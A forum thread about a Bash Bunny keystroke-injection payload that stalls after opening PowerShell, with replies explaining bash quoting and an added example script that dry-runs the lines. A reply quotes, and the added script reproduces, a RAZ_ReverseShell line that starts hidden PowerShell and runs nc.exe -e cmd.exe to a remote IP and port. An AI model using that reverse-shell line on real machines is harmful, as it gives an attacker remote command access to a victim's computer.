Simple payload gets stuck halfway through


HamHack

Hey.

For some reason my Bash Bunny script gets stuck right after opening up PowerShell, but I can't seem to figure out why it's happening. I tried replacing the line right under the 500 delay with a simple string, which made it work, but it won't work as is.

This is my script:

LED SETUP

ATTACKMODE HID STORAGE

LED ATTACK

Q SET_LANGUAGE gb

Q GUI r
Q DELAY 150
Q STRING powershell
Q ENTER

Q DELAY 500

Q STRING cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)
Q ENTER
Q STRING cd payloads/switch1
Q ENTER

LED FINISH

@GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny.

It's being written like this: cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2)

But I need it to write it like this: cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)

How do I get it to include the single quotes as well?

I'm not a PowerShell guy, to be honest...

But why aren't you using the similar commands from other payloads, e.g. RAZ_ReverseShell:

QUACK STRING "powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\""

The issue is with how bash on the Bunny is interpreting your string. As an example, echo that line in a Linux bash terminal and you will see the issue, i.e. replace "QUACK STRING" with echo, if you have access to a bash terminal. If not, here is a trick.

After your QUACK STRING, encapsulate the whole command in double quotes. Once you do that, you will only need to escape "$" and other inner double quotes. Single quotes can stand by themselves without needing to be escaped. Example:

Q STRING "cd (gwmi -class win32_volume -filter \"label='BashBunny'\").Name.Substring(0,2)"

That should fix your issue without changing your method.

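The quoting rule in the answer above can be checked offline before the payload ever goes on a Bunny. The bash snippet below is an added example (it is not part of this thread or of the Hak5 payload library): it stands in for the Bunny's Q/QUACK command with a function that prints what bash passes to it, parses the original unquoted line with bash -n to show the syntax error that stops the payload, prints the double-quoted fix from the answer, and prints a RAZ_ReverseShell-style line to show the same rule with bash variable expansion. The switch position, IP address and port are constructed placeholder values.

```shell
#!/usr/bin/env bash
# Added example, not from the thread: dry-run Bash Bunny QUACK STRING lines on
# any Linux box to see exactly what bash hands to the keystroke injector.

# Stand-in for the Bunny's Q / QUACK: drop the STRING keyword and print the
# text the Bunny would type, after bash has done its quote removal.
Q() { shift; printf '%s\n' "$*"; }

# Variant 1: the original, unquoted line from the first post.  Only parsed
# (bash -n), never run: bash treats the bare "(" as a subshell token, aborts
# with "syntax error near unexpected token `('", and the payload stops right
# after PowerShell has been opened.  Returns bash's parse status (2 = error).
check_original() {
  local tmp rc
  tmp=$(mktemp)
  cat >"$tmp" <<'EOF'
Q() { shift; printf '%s\n' "$*"; }
Q STRING cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)
EOF
  bash -n "$tmp" 2>/dev/null
  rc=$?
  rm -f "$tmp"
  return "$rc"
}

# Variant 2: the fix from the answer.  The whole command sits in double quotes,
# so "(" and ")" are literal; the inner double quotes are escaped with \" and
# the single quotes need nothing.  Prints the exact PowerShell command wanted.
fixed_line() {
  Q STRING "cd (gwmi -class win32_volume -filter \"label='BashBunny'\").Name.Substring(0,2)"
}

# Variant 3: the RAZ_ReverseShell style from the other reply.  Same
# double-quoting rule; here the unescaped ${...} are expanded by bash on
# purpose, and PowerShell's doubled single quotes ('' -> ') survive untouched.
# SWITCH_POSITION, my_ip and my_port are constructed placeholder values.
raz_style_line() {
  local SWITCH_POSITION=switch1 my_ip=10.0.0.5 my_port=4444
  Q STRING "powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\""
}

# printf rather than echo: the typed text contains backslashes, and some
# shells' echo would turn "\n" in the path into a newline.
if check_original; then
  printf 'original line : parses (unexpected)\n'
else
  printf 'original line : bash syntax error, payload would stop here\n'
fi
printf 'fixed line    : %s\n' "$(fixed_line)"
printf 'RAZ-style line: %s\n' "$(raz_style_line)"
```

The same parse-only check works on a whole payload with `bash -n payload.txt`; a non-zero exit means the Bunny's bash would have died at that line too, which is what "stuck right after opening PowerShell" looks like from the keyboard side.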
